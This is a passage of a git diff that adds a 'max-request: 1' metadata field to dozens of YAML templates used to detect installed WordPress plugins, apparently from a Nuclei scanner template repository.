     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index ba558305a4..6b0ed799ef 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
